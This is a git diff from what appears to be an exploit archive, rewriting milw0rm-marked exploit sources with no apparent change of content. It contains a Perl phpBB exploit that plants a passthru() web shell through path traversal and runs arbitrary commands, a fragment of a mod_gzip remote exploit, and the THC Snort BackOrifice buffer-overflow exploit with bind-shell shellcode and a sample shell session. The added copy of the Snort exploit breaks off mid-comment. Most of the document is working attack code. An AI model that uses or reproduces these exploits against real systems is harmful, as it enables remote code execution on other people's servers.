- ], - ); - if($res->is_success) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; } - else { print " [ FAILED ]\n"; exit(0); } - print "[~] Delete style from database ..."; - $sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="0wn";'; - &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); - print " [ DONE ]\n"; - print "-----------------------------------------------------------------------------------\n"; - exit(0); - } - -$jagajaga = 'echo _GHC/RST_ '; -$jagajaga .= $cmdspl; -$jagajaga .= $cmd; -$jagajaga .= $cmdspl; -$jagajaga .= ' echo _GHC/RST_'; - -$res = $xpl->post( - "${path}admin_styles.php?mode=addnew&sid=${sid}&install_to=${dir}", - [ - 'jagajaga' => "$jagajaga" - ] - ); - -&show_header; - -if($res->content =~ /main\(\): Failed opening/) { print "[-] Error!\nFailed include file! Maybe you forgot create shell file first?\n"; exit(); } - -@rez = split("_GHC/RST_",$res->content); -print "-----------------------------------------------------------------------------------\n"; -print @rez[1]; -print "-----------------------------------------------------------------------------------\n"; - -sub usage(){ - print "-----------------------------------------------------------------------------------\n"; - print " phpBB admin_styles.php command execution exploit by 1dt.w0lf\n"; - print "-----------------------------------------------------------------------------------\n"; - print "Usage: $0 [options]\n"; - print "\nOptions:\n\n"; - print " -p path to phpBB admin interface e.g. http://site.com/phpBB/admin/\n\n"; - print " -s admin sid ... yeeesss you need admin rights for use this exploit =)\n\n"; - print " -P database prefix (optional) default \"phpbb_\"\n\n"; - print " -c [create|clear|get_prefix|(any unix/win command)]\n\n"; - print " \"create\" for first create shell *default\n"; - print " \"clear\" for delete our NULL styles from database\n"; - print " \"get_prefix\" get table prefix\n"; - print " \"any unix or win commands\" for commands execute =)\n\n"; - print " -m method [1|2] (optional) default \"2\"\n\n"; - print " 1 - use mysql function \"INTO OUTFILE\" for creating new file\n"; - print " 2 - use phpBB functions \"create style\" and \"export style\" for create new file\n"; - print "-----------------------------------------------------------------------------------\n"; - print " RST/GHC private stuff , http://rst.void.ru , http://ghc.ru\n"; - exit(); -} - -sub show_header() -{ -print "-----------------------------------------------------------------------------------\n"; -print " phpBB admin_styles.php command execution exploit by RST/GHC\n"; -print "-----------------------------------------------------------------------------------\n"; -} - -sub phpbb_sql_query($$){ -$res = $xpl->post("$_[0]", -Content_type => 'form-data', -Content => [ - perform => 'restore', - restore_start => 'Start Restore', - backup_file => [ - undef, - '0wneeeeedddd', - Content_type => 'text/plain', - Content => "$_[1]", - ], - ] -); -if ($res->is_success) - { - if ($res->content =~ /already exists/) { return 2; } - if ($res->content =~ /The Database has been successfully restored/) { return 1; } - } -return 0; -} - -# milw0rm.com [2005-10-11] +#!/usr/bin/perl + +### r57phpbb_admin2exec.pl +### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +### phpBB admin_styles.php commands execution exploit +### tested on phpBB 2.0.13 +### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +### by 1dt.w0lf +### RST/GHC +### http://rst.void.ru +### http://ghc.ru +### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +### screen +### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -c get_prefix +### ----------------------------------------------------------------------------------- +### [~] Try to get prefix ...[ DONE ] +### PREFIX : phpbb_ +### ----------------------------------------------------------------------------------- +### +### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -P phpbb_ +### ----------------------------------------------------------------------------------- +### [!] Method 2 - use "create\export style" +### [~] Try to run sql query in database ... [ DONE ] +### [~] Creating new style ... [ DONE ] +### [~] Creating file ... [ DONE ] +### [+] File successfully created! Now you can try execute command! +### [~] Delete style from database ... [ DONE ] +### ----------------------------------------------------------------------------------- +### +### r57phpbb_admin2exec.pl -p http://blah.com/phpBB/admin/ -s 0864cb0abb396319c589ebc2a98c2c5d -c "uname -sr; id" +### ----------------------------------------------------------------------------------- +### FreeBSD 5.3-RELEASE +### uid=80(www) gid=80(www) groups=80(www) +### ----------------------------------------------------------------------------------- +### 20.04.2005 + +use LWP::UserAgent; +use Getopt::Std; + +getopts("p:s:P:c:m:"); + +$path = $opt_p; +$sid = $opt_s; +$prefix = $opt_P || 'phpbb_'; +$cmd = $opt_c || 'create'; +$method = $opt_m || 2; + +#################### LITTLE CONFIG +# forum on win or unix? commands split by ; or && +$cmdspl = ';'; # unix +# filename for create. default is 'theme_info.cfg' for include in admin_styles.php?mode=addnew +# DONT CHANGE if you don't know that you do!!! +$filename = '/theme_info.cfg'; +# folder for create file, we need folder writable for apache user, by default we use /tmp +$dir = '../../../../../../../../../../../../../../../../../../../../../tmp'; +#################### END CONFIG + +if(!$path || !$sid) { &usage; } + +$xpl = LWP::UserAgent->new() or die; + +if($cmd eq 'clear') + { + &show_header; + print "-----------------------------------------------------------------------------------\n"; + print "[~] Clearing database ... "; + $sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="" AND template_name="";'; + $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); + if(!$suc) { print " [ FAILED ]\n"; exit(); } + if($suc == 1) { print " [ DONE ]\n"; } + print "-----------------------------------------------------------------------------------\n"; + exit(); + } + +if($cmd eq 'create' && $method == 1) + { + &show_header; + print "-----------------------------------------------------------------------------------\n"; + print "[!] Method 1 - use \"INTO OUTFILE\"\n"; + print "[!] Create file for including.\n"; + print "[~] Try to run sql query in database..."; + $sql = 'SELECT \'\' FROM '.$prefix.'users LIMIT 1 INTO OUTFILE \''.$dir.$filename.'\';'; + $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); + if(!$suc) { print " [ FAILED ]\n"; exit(); } + if($suc == 2) { print " [ DONE ]\n[!] File already exists! Now you can try execute command!\n"; } + if($suc == 1) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; } + print "-----------------------------------------------------------------------------------\n"; + exit(); + } + +if($cmd eq 'get_prefix') + { + &show_header; + print "-----------------------------------------------------------------------------------\n"; + print "[~] Try to get prefix ..."; + $res = $xpl->get( + "${path}admin_db_utilities.php?perform=backup&additional_tables=&backup_type=structure&drop=0&backupstart=1&gzipcompress=0&startdownload=1&sid=$sid" + ); + if($res->is_success && $res->content =~ /(TABLE: )(.*)(auth_access)/) + { + $prefix = ($2)?($2):("No prefix"); + print "[ DONE ]\nPREFIX : $prefix\n"; + } + else { print "[ FAILED ]\n"; } + print "-----------------------------------------------------------------------------------\n"; + exit(0); + } + +if($cmd eq 'create' && $method == 2) + { + &show_header; + print "-----------------------------------------------------------------------------------\n"; + print "[!] Method 2 - use \"create\\export style\"\n"; + print "[~] Try to run sql query in database ..."; + $sql = 'ALTER TABLE `'.$prefix.'themes` CHANGE `template_name` `template_name` VARCHAR( 255 ) NOT NULL;'; + $suc = &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); + if(!$suc) { print " [ FAILED ]\n"; exit(); } + if($suc == 1) { print " [ DONE ]\n"; } + print "[~] Creating new style ..."; + $res = $xpl->post( + "${path}admin_styles.php?sid=$sid", + [ + 'style_name' => '0wn', + 'template_name' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir, + 'mode' => 'create', + 'submit' => 'Save Settings' + ], + ); + if($res->is_success){ print " [ DONE ]\n[~] Creating file ..."; } + else { print " [ FAILED ]\n"; exit(0); } + $res = $xpl->post( + "${path}admin_styles.php?sid=$sid", + [ + 'export_template' => 'a=12;passthru($_POST[jagajaga]);exit(0);//'.$dir, + 'mode' => 'export', + 'edit' => 'Submit' + ], + ); + if($res->is_success) { print " [ DONE ]\n[+] File successfully created! Now you can try execute command!\n"; } + else { print " [ FAILED ]\n"; exit(0); } + print "[~] Delete style from database ..."; + $sql = 'DELETE FROM `'.$prefix.'themes` WHERE style_name="0wn";'; + &phpbb_sql_query("${path}admin_db_utilities.php?sid=$sid",$sql); + print " [ DONE ]\n"; + print "-----------------------------------------------------------------------------------\n"; + exit(0); + } + +$jagajaga = 'echo _GHC/RST_ '; +$jagajaga .= $cmdspl; +$jagajaga .= $cmd; +$jagajaga .= $cmdspl; +$jagajaga .= ' echo _GHC/RST_'; + +$res = $xpl->post( + "${path}admin_styles.php?mode=addnew&sid=${sid}&install_to=${dir}", + [ + 'jagajaga' => "$jagajaga" + ] + ); + +&show_header; + +if($res->content =~ /main\(\): Failed opening/) { print "[-] Error!\nFailed include file! Maybe you forgot create shell file first?\n"; exit(); } + +@rez = split("_GHC/RST_",$res->content); +print "-----------------------------------------------------------------------------------\n"; +print @rez[1]; +print "-----------------------------------------------------------------------------------\n"; + +sub usage(){ + print "-----------------------------------------------------------------------------------\n"; + print " phpBB admin_styles.php command execution exploit by 1dt.w0lf\n"; + print "-----------------------------------------------------------------------------------\n"; + print "Usage: $0 [options]\n"; + print "\nOptions:\n\n"; + print " -p path to phpBB admin interface e.g. http://site.com/phpBB/admin/\n\n"; + print " -s admin sid ... yeeesss you need admin rights for use this exploit =)\n\n"; + print " -P database prefix (optional) default \"phpbb_\"\n\n"; + print " -c [create|clear|get_prefix|(any unix/win command)]\n\n"; + print " \"create\" for first create shell *default\n"; + print " \"clear\" for delete our NULL styles from database\n"; + print " \"get_prefix\" get table prefix\n"; + print " \"any unix or win commands\" for commands execute =)\n\n"; + print " -m method [1|2] (optional) default \"2\"\n\n"; + print " 1 - use mysql function \"INTO OUTFILE\" for creating new file\n"; + print " 2 - use phpBB functions \"create style\" and \"export style\" for create new file\n"; + print "-----------------------------------------------------------------------------------\n"; + print " RST/GHC private stuff , http://rst.void.ru , http://ghc.ru\n"; + exit(); +} + +sub show_header() +{ +print "-----------------------------------------------------------------------------------\n"; +print " phpBB admin_styles.php command execution exploit by RST/GHC\n"; +print "-----------------------------------------------------------------------------------\n"; +} + +sub phpbb_sql_query($$){ +$res = $xpl->post("$_[0]", +Content_type => 'form-data', +Content => [ + perform => 'restore', + restore_start => 'Start Restore', + backup_file => [ + undef, + '0wneeeeedddd', + Content_type => 'text/plain', + Content => "$_[1]", + ], + ] +); +if ($res->is_success) + { + if ($res->content =~ /already exists/) { return 2; } + if ($res->content =~ /The Database has been successfully restored/) { return 1; } + } +return 0; +} + +# milw0rm.com [2005-10-11] diff --git a/platforms/linux/remote/126.c b/platforms/linux/remote/126.c index 9842f07a4..9f1ad55bd 100755 --- a/platforms/linux/remote/126.c +++ b/platforms/linux/remote/126.c @@ -267,6 +267,6 @@ printf("\nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]\n\t\t by xCrZx [ return 0; -} - -// milw0rm.com [2003-11-20] +} + +// milw0rm.com [2003-11-20] diff --git a/platforms/linux/remote/1272.c b/platforms/linux/remote/1272.c index 255118764..246ecd0b1 100755 --- a/platforms/linux/remote/1272.c +++ b/platforms/linux/remote/1272.c @@ -1,419 +1,419 @@ -/* - * THCsnortbo 0.3 - Snort BackOrifice PING exploit - * by rd@thc.org - * THC PUBLIC SOURCE MATERIALS - * - * Bug was found by Internet Security Systems - * http://xforce.iss.net/xforce/alerts/id/207 - * - * v0.3 - removed/cleaned up info for public release - * v0.2 - details added, minor changes - * v0.1 - first release - * - * Greetz to all guests at THC's 10th - * Anniversary (TAX) :> - * - * $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $ - * - */ - -/* - * DETAILS - * - * The bug is in spp_bo.c, BoGetDirection() function - * static int BoGetDirection(Packet *p, char *pkt_data) { - * u_int32_t len = 0; - * u_int32_t id = 0; - * u_int32_t l, i; - * char type; - * char buf1[1024]; - * - * ... - * buf_ptr = buf1; - * ... - * while ( i < len ) { - * plaintext = (char) (*pkt_data ^ (BoRand()%256)); - * *buf_ptr = plaintext; - * i++; - * pkt_data++; - * buf_ptr++; - * - * len is taken from the BO packet header, so its a buffer - * overflow when len > buf1 size. - * - * The exchange of data between the BO client and server is - * done using encrypted UDP packets - * - * BO Packet Format (Ref: http://www.magnux.org/~flaviovs/boproto.html) - * Mnemonic Size in bytes - * MAGIC 8 - * LEN 4 - * ID 4 - * T 1 - * DATA variable - * CRC 1 - * - * On x86, because of the stack layout, we end up overwriting - * the loop counter (i and len). To solve this problem, we - * can set back the approriate value for i and len. We can - * also able to set a NULL byte to stop the loop. - * - * There is no chance for bruteforce, snort will die after the - * first bad try. On Linux system with kernel 2.6 with VA - * randomized, it would be much harder for a reliable exploit. - * - * - * In case of _non-optimized_ compiled snort binary, the stack - * would looks like this: - * - * [ buf1 ]..[ i ]..[ len ]..[ebp][eip][*p][*pkt_data] - * - * The exploit could be reliable in this case, by using a - * pop/ret return addess. Lets send to snort a UDP packet - * as the following: - * - * [ BO HEADERS ][ .. ][ i ][ .. ][ len ][ .. ][ ret addr ][ NOP ][ shellcode ] - * [ Encrypted ][ Non Encrypted ] - * - * When the overwriting loop stop, pkt_data will point to - * the memory after return address (NOP part) in raw packet - * data. So, using a return address that points to POP/RET - * instructions would be enough for a reliable exploit. - * (objdump -d binary|grep -B1 ret|grep -A1 pop to find one) - * - * This method will work well under linux kernel 2.6 with VA - * randomized also. - * - * In case of optimized binary, it would be harder since - * the counter i, len and buffer pointers could/possibly be - * registered variables. And the register points to buffer - * get poped from stack when the funtion return. In this case, - * the return address should be hard-coded but it would be - * unreliable (especially on linux kernel 2.6 with VA - * randomization patch). - * - * This exploit would generally work. Providing that you know - * how to find and use correct offsets and return address :> - * - * - * Example: - * - * $ ./THCsnortbo - * Snort BackOrifice PING exploit (version 0.3) - * by rd@thc.org - * - * Usage: ./THCsnortbo host target - * - * Available Targets: - * 1 | manual testing gcc with -O0 - * 2 | manual testing gcc with -O2 - * - * $ ./snortbo 192.168.0.101 1 - * Snort BackOrifice PING exploit (version 0.3) - * by rd@thc.org - * - * Selected target: - * 1 | manual testing gcc with -O0 - * - * Sending exploit to 192.168.0.101 - * Done. - * - * $ nc 192.168.0.101 31337 - * id - * uid=104(snort) gid=409(snort) groups=409(snort) - * uname -sr - * Linux 2.6.11-hardened-r1 - * - */ - -#include -#include -#include -#include -#include -#include -#include -#ifdef HAVE_UNISTD_H -#include -#endif -#ifdef HAVE_SYS_TIME_H -#include -#endif -#ifdef HAVE_SYS_SELECT_H -#include -#endif -#ifdef HAVE_STRINGS_H -#include -#endif -#ifdef HAVE_MALLOC_H -#include -#endif -#include -#include -#include - -#define VERSION "0.3" - -/* shellcodes */ - -/* a quick test bind shellcode on port 31337 from metasploit - * - * Connect back shellcode for snort exploit should be better, do - * it by yourself. im lazy :> - */ -unsigned char x86_lnx_bind[] = -"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" -"\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" -"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" -"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" -"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" -"\x89\xe1\xcd\x80"; - -typedef struct { - char *desc; // description - unsigned char *scode; // shellcode - unsigned int scode_len; - unsigned long retaddr; // return address - unsigned int i_var_off; // offset from buf1 to variable 'i' - unsigned int len_var_off; // offset from buf1 to variable 'len' - unsigned int ret_off; // offset from buf1 to saved eip - unsigned int datasize; // value of size field in BO ping packet -} t_target; - -t_target targets[] = { - { - "manual testing gcc with -O0", - x86_lnx_bind, sizeof(x86_lnx_bind), - //0x0804aa07, - 0x4008f000+0x16143, // pop/ret in libc - 1024+1+32, 1024+1+44, 1024+1+60, - 0xFFFFFFFF - }, - { - "manual testing gcc with -O2", - x86_lnx_bind, sizeof(x86_lnx_bind), - 0x0804aa07, //0xbfffe9e0 - 1024+1+8, 1024+1+20, 1024+1+44, - 1048+4+24 - }, - { NULL, NULL, 0, 0, 0, 0, 0, 0 } -}; - -#define PACKETSIZE 1400 -#define OVERFLOW_BUFFSZ 1024 -#define IVAL 0x11223344; -#define LVAL 0x11223354+16; - -#define ARGSIZE 256 -#define PORT 53 -#define MAGICSTRING "*!*QWTY?" -#define MAGICSTRINGLEN 8 -#define TYPE_PING 0x01 - -static long holdrand = 1L; -char g_password[ARGSIZE]; -int port = PORT; - -/* - * borrowed some code from BO client - */ -void msrand (unsigned int seed ) -{ - holdrand = (long)seed; -} - -int mrand ( void) -{ - return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff); -} - -unsigned int getkey() -{ - int x, y; - unsigned int z; - - y = strlen(g_password); - if (!y) - return 31337; - else { - z = 0; - for (x = 0; x < y; x++) - z+= g_password[x]; - - for (x = 0; x < y; x++) { - if (x%2) - z-= g_password[x] * (y-x+1); - else - z+= g_password[x] * (y-x+1); - z = z%RAND_MAX; - } - - z = (z * y)%RAND_MAX; - return z; - } -} - -void BOcrypt(unsigned char *buff, int len) -{ - int y; - - if (!len) - return; - - msrand(getkey()); - for (y = 0; y < len; y++) - buff[y] = buff[y] ^ (mrand()%256); -} - -void explbuild(unsigned char *buff, t_target *t) -{ - unsigned char *ptr; - unsigned long *pdw; - unsigned long size; - unsigned char *scode; - unsigned int scode_len; - unsigned long retaddr; - unsigned int i_var_off; - unsigned int len_var_off; - unsigned int ret_off; - unsigned int datasize; - - scode = t->scode; - scode_len = t->scode_len; - retaddr = t->retaddr; - i_var_off = t->i_var_off; - len_var_off = t->len_var_off; - ret_off = t->ret_off; - datasize = t->datasize; - - memset(buff, 0x90, PACKETSIZE); - buff[PACKETSIZE - 1] = 0; - - strcpy(buff, MAGICSTRING); - - pdw = (unsigned long *)(buff + MAGICSTRINGLEN); - *pdw++ = datasize; - *pdw++ = (unsigned long)-1; - ptr = (unsigned char *)pdw; - *ptr++ = TYPE_PING; - - size = IVAL; - memcpy(buff + i_var_off, &size, 4); - size = LVAL; - memcpy(buff + len_var_off, &size, 4); - - memcpy(buff + ret_off, &retaddr, 4); - - /* you may want to place shellcode on encrypted part and will - * be decrypted into buf1 by BoGetDirection - */ - // memcpy(buff + OVERFLOW_BUFFSZ - scode_len - 128, - // (char *) scode, scode_len); - - memcpy(buff + PACKETSIZE - scode_len - 1, (char *)scode, scode_len); - - /* you may want to set NULL byte to stop the loop here, but it - * won't work with pop/ret method - */ - // buff[ret_off + 4] = 0; - - size = ret_off + 4; - BOcrypt(buff, (int)size); -} - -int sendping(unsigned long dest, int port, int sock, unsigned char *buff) -{ - struct sockaddr_in host; - int i, size; - fd_set fdset; - struct timeval tv; - - size=PACKETSIZE; - host.sin_family = AF_INET; - host.sin_port = htons((u_short)port); - host.sin_addr.s_addr = dest; - - FD_ZERO(&fdset); - FD_SET(sock, &fdset); - tv.tv_sec = 10; - tv.tv_usec = 0; - - i = select(sock+1, NULL, &fdset, NULL, &tv); - if (i == 0) { - printf("Timeout\n"); - return(1); - } else if (i < 0) { - perror("select: "); - return(1); - } - - if ( (sendto(sock, buff, size, 0, - (struct sockaddr *)&host, sizeof(host))) != size ) { - perror("sendto: "); - return(1); - } - - return 0; -} - -void usage(char *prog) -{ - int n; - - printf("Usage: %s host target\n\nAvailable Targets:\n", prog); - - for (n = 0 ; targets[n].desc != NULL ; n++) - printf ("%3d | %s\n", n + 1, targets[n].desc); - printf (" \n"); -} - - -int main(int argc, char **argv) -{ - struct in_addr hostin; - unsigned long dest; - char buff[PACKETSIZE]; - int ntarget; - - printf("Snort BackOrifice PING exploit (version "VERSION")\n" - "by rd@thc.org\n\n"); - - if (argc < 3 || ((ntarget = atoi(argv[2])) <= 0) ) { - usage(argv[0]); - return 0; - } - - if (ntarget >= (sizeof(targets) / sizeof(t_target))) { - printf ("WARNING: target out of list. list:\n\n"); - usage(argv[0]); - return 0; - } - - ntarget = ntarget - 1; - - // change the key here to avoid the detection of a simple - // packet matching IDS signature. - g_password[0] = 0; - - if ( (dest = inet_addr(argv[1])) == (unsigned long)-1) - printf("Bad IP: '%s'\n", argv[1]); - else { - int s; - hostin.s_addr = dest; - s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP); - - printf("Selected target:\n%3d | %s\n", ntarget+1, - targets[ntarget].desc); - explbuild(buff, &targets[ntarget]); - - printf("\nSending exploit to %s\n", inet_ntoa(hostin)); - if (sendping(dest, port, s, buff)) - printf("Sending exploit failed for dest %s\n", - inet_ntoa(hostin)); - printf("Done.\n"); - } - - return 0; -} - -// milw0rm.com [2005-10-25] +/* + * THCsnortbo 0.3 - Snort BackOrifice PING exploit + * by rd@thc.org + * THC PUBLIC SOURCE MATERIALS + * + * Bug was found by Internet Security Systems + * http://xforce.iss.net/xforce/alerts/id/207 + * + * v0.3 - removed/cleaned up info for public release + * v0.2 - details added, minor changes + * v0.1 - first release + * + * Greetz to all guests at THC's 10th + * Anniversary (TAX) :> + * + * $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $ + * + */ + +/* + * DETAILS + * + * The bug is in spp_bo.c, BoGetDirection() function + * static int BoGetDirection(Packet *p, char *pkt_data) { + * u_int32_t len = 0; + * u_int32_t id = 0; + * u_int32_t l, i; + * char type; + * char buf1[1024]; + * + * ... + * buf_ptr = buf1; + * ... + * while ( i < len ) { + * plaintext = (char) (*pkt_data ^ (BoRand()%256)); + * *buf_ptr = plaintext; + * i++; + * pkt_data++; + * buf_ptr++; + * + * len is taken from the BO packet header, so its a buffer + * overflow when len > buf1 size. + * + * The exchange of data between the BO client and server is + * done using encrypted UDP packets + * + * BO Packet Format (Ref: http://www.magnux.org/~flaviovs/boproto.html) + * Mnemonic Size in bytes + * MAGIC 8 + * LEN 4 + * ID 4 + * T 1 + * DATA variable + * CRC 1 + * + * On x86, because of the stack layout, we end up overwriting + * the loop counter (i and len). To solve this problem, we + * can set back the approriate value for i and len. We can + * also able to set a NULL byte to stop the loop. + * + * There is no chance for bruteforce, snort will die after the + * first bad try. On Linux system with kernel 2.6 with VA + * randomized, it would be much harder for a reliable exploit. + * + * + * In case of _non-optimized_ compiled snort binary, the stack + * would looks like this: + * + * [ buf1 ]..[ i ]..[ len ]..[ebp][eip][*p][*pkt_data] + * + * The exploit could be reliable in this case, by using a + * pop/ret return addess. Lets send to snort a UDP packet + * as the following: + * + * [ BO HEADERS ][ .. ][ i ][ .. ][ len ][ .. ][ ret addr ][ NOP ][ shellcode ] + * [ Encrypted ][ Non Encrypted ] + * + * When the overwriting loop stop, pkt_data will point to + * the memory after return address (NOP part) in raw packet + * data. So, using a return address that points to POP/RET + * instructions would be enough for a reliable exploit. + * (objdump -d binary|grep -B1 ret|grep -A1 pop to find one) + * + * This method will work well under linux kernel 2.6 with VA + * randomized also. + * + * In case of optimized binary, it would be harder since + * the counter i, len and buffer pointers could/possibly be + * registered variables. And the register points to buffer + * get poped from stack when the funtion return. In this case, + * the return address should be hard-coded but it would be + * unreliable (especially on linux kernel 2.6 with VA + * randomization patch). + * + * This exploit would generally work. Providing that you know + * how to find and use correct offsets and return address :> + * + * + * Example: + * + * $ ./THCsnortbo + * Snort BackOrifice PING exploit (version 0.3) + * by rd@thc.org + * + * Usage: ./THCsnortbo host target + * + * Available Targets: + * 1 | manual testing gcc with -O0 + * 2 | manual testing gcc with -O2 + * + * $ ./snortbo 192.168.0.101 1 + * Snort BackOrifice PING exploit (version 0.3) + * by rd@thc.org + * + * Selected target: + * 1 | manual testing gcc with -O0 + * + * Sending exploit to 192.168.0.101 + * Done. + * + * $ nc 192.168.0.101 31337 + * id + * uid=104(snort) gid=409(snort) groups=409(snort) + * uname -sr + * Linux 2.6.11-hardened-r1 + * + */ + +#include +#include +#include +#include +#include +#include +#include +#ifdef HAVE_UNISTD_H +#include +#endif +#ifdef HAVE_SYS_TIME_H +#include +#endif +#ifdef HAVE_SYS_SELECT_H +#include +#endif +#ifdef HAVE_STRINGS_H +#include +#endif +#ifdef HAVE_MALLOC_H +#include +#endif +#include +#include +#include + +#define VERSION "0.3" + +/* shellcodes */ + +/* a quick test bind shellcode on port 31337 from metasploit + * + * Connect back shellcode for snort exploit should be better, do + * it by yourself. im lazy :> + */ +unsigned char x86_lnx_bind[] = +"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" +"\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" +"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" +"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" +"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" +"\x89\xe1\xcd\x80"; + +typedef struct { + char *desc; // description + unsigned char *scode; // shellcode + unsigned int scode_len; + unsigned long retaddr; // return address + unsigned int i_var_off; // offset from buf1 to variable 'i' + unsigned int len_var_off; // offset from buf1 to variable 'len' + unsigned int ret_off; // offset from buf1 to saved eip + unsigned int datasize; // value of size field in BO ping packet +} t_target; + +t_target targets[] = { + { + "manual testing gcc with -O0", + x86_lnx_bind, sizeof(x86_lnx_bind), + //0x0804aa07, + 0x4008f000+0x16143, // pop/ret in libc + 1024+1+32, 1024+1+44, 1024+1+60, + 0xFFFFFFFF + }, + { + "manual testing gcc with -O2", + x86_lnx_bind, sizeof(x86_lnx_bind), + 0x0804aa07, //0xbfffe9e0 + 1024+1+8, 1024+1+20, 1024+1+44, + 1048+4+24 + }, + { NULL, NULL, 0, 0, 0, 0, 0, 0 } +}; + +#define PACKETSIZE 1400 +#define OVERFLOW_BUFFSZ 1024 +#define IVAL 0x11223344; +#define LVAL 0x11223354+16; + +#define ARGSIZE 256 +#define PORT 53 +#define MAGICSTRING "*!*QWTY?" +#define MAGICSTRINGLEN 8 +#define TYPE_PING 0x01 + +static long holdrand = 1L; +char g_password[ARGSIZE]; +int port = PORT; + +/* + * borrowed some code from BO client + */ +void msrand (unsigned int seed ) +{ + holdrand = (long)seed; +} + +int mrand ( void) +{ + return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff); +} + +unsigned int getkey() +{ + int x, y; + unsigned int z; + + y = strlen(g_password); + if (!y) + return 31337; + else { + z = 0; + for (x = 0; x < y; x++) + z+= g_password[x]; + + for (x = 0; x < y; x++) { + if (x%2) + z-= g_password[x] * (y-x+1); + else + z+= g_password[x] * (y-x+1); + z = z%RAND_MAX; + } + + z = (z * y)%RAND_MAX; + return z; + } +} + +void BOcrypt(unsigned char *buff, int len) +{ + int y; + + if (!len) + return; + + msrand(getkey()); + for (y = 0; y < len; y++) + buff[y] = buff[y] ^ (mrand()%256); +} + +void explbuild(unsigned char *buff, t_target *t) +{ + unsigned char *ptr; + unsigned long *pdw; + unsigned long size; + unsigned char *scode; + unsigned int scode_len; + unsigned long retaddr; + unsigned int i_var_off; + unsigned int len_var_off; + unsigned int ret_off; + unsigned int datasize; + + scode = t->scode; + scode_len = t->scode_len; + retaddr = t->retaddr; + i_var_off = t->i_var_off; + len_var_off = t->len_var_off; + ret_off = t->ret_off; + datasize = t->datasize; + + memset(buff, 0x90, PACKETSIZE); + buff[PACKETSIZE - 1] = 0; + + strcpy(buff, MAGICSTRING); + + pdw = (unsigned long *)(buff + MAGICSTRINGLEN); + *pdw++ = datasize; + *pdw++ = (unsigned long)-1; + ptr = (unsigned char *)pdw; + *ptr++ = TYPE_PING; + + size = IVAL; + memcpy(buff + i_var_off, &size, 4); + size = LVAL; + memcpy(buff + len_var_off, &size, 4); + + memcpy(buff + ret_off, &retaddr, 4); + + /* you may want to place shellcode on encrypted part and will + * be decrypted into buf1 by BoGetDirection + */ + // memcpy(buff + OVERFLOW_BUFFSZ - scode_len - 128, + // (char *) scode, scode_len); + + memcpy(buff + PACKETSIZE - scode_len - 1, (char *)scode, scode_len); + + /* you may want to set NULL byte to stop the loop here, but it + * won't work with pop/ret method + */ + // buff[ret_off + 4] = 0; + + size = ret_off + 4; + BOcrypt(buff, (int)size); +} + +int sendping(unsigned long dest, int port, int sock, unsigned char *buff) +{ + struct sockaddr_in host; + int i, size; + fd_set fdset; + struct timeval tv; + + size=PACKETSIZE; + host.sin_family = AF_INET; + host.sin_port = htons((u_short)port); + host.sin_addr.s_addr = dest; + + FD_ZERO(&fdset); + FD_SET(sock, &fdset); + tv.tv_sec = 10; + tv.tv_usec = 0; + + i = select(sock+1, NULL, &fdset, NULL, &tv); + if (i == 0) { + printf("Timeout\n"); + return(1); + } else if (i < 0) { + perror("select: "); + return(1); + } + + if ( (sendto(sock, buff, size, 0, + (struct sockaddr *)&host, sizeof(host))) != size ) { + perror("sendto: "); + return(1); + } + + return 0; +} + +void usage(char *prog) +{ + int n; + + printf("Usage: %s host target\n\nAvailable Targets:\n", prog); + + for (n = 0 ; targets[n].desc != NULL ; n++) + printf ("%3d | %s\n", n + 1, targets[n].desc); + printf (" \n"); +} + + +int main(int argc, char **argv) +{ + struct in_addr hostin; + unsigned long dest; + char buff[PACKETSIZE]; + int ntarget; + + printf("Snort BackOrifice PING exploit (version "VERSION")\n" + "by rd@thc.org\n\n"); + + if (argc < 3 || ((ntarget = atoi(argv[2])) <= 0) ) { + usage(argv[0]); + return 0; + } + + if (ntarget >= (sizeof(targets) / sizeof(t_target))) { + printf ("WARNING: target out of list. list:\n\n"); + usage(argv[0]); + return 0; + } + + ntarget = ntarget - 1; + + // change the key here to avoid the detection of a simple + // 